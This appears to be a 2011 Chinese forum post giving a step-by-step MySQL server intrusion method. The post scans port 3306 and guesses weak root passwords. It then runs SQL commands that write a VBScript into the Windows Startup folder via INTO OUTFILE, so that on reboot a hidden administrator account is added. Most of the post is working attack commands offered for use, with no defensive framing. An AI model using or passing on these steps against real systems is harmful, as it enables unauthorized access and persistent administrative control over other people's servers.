|
|
|
最近正好看了些PHP+MySQL的东西,所以便思考了一下MySQL入侵的方法.
MySQL的默认端口是3306,首先扫3306端口,再扫弱口令,然后连接,下面主要讲下连接后的操作.
连接到MySQL服务器:
mysql -uroot -h192.168.0.1 -p123456 //root 是密码,192.168.0.1是服务器IP, 123456是密码
查看服务器中有些什么数据库:
mysql>show databases; // 分号不能少,mysql默认是用分号结束语句.
MySQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库.
接着进入数据库:
mysql>use test;
进入test数据库中,查看数据库中有哪些数据表:
mysql>show tables;
默认的情况下,test中没有任何表的存在.
在TEST数据库下创建一个新的表:
mysql>create table a (cmd text);
创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本.
在表中插入内容:
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 123456$ 123456/add"",0) " );
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 123456$ /add"",0) " );
现在我们来看看表a中有些什么:
mysql>select * from a;
输出表为一个VBS的脚本文件
mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs";
等待重起..over.!
很酷地拿到权限了!Well Done! |
|
|手机版|Java学习者论坛
( 声明:本站资料整理自互联网,用于Java学习者交流学习使用,对资料版权不负任何法律责任,若有侵权请及时联系客服屏蔽删除 )
发表于 2011-9-27 13:00:58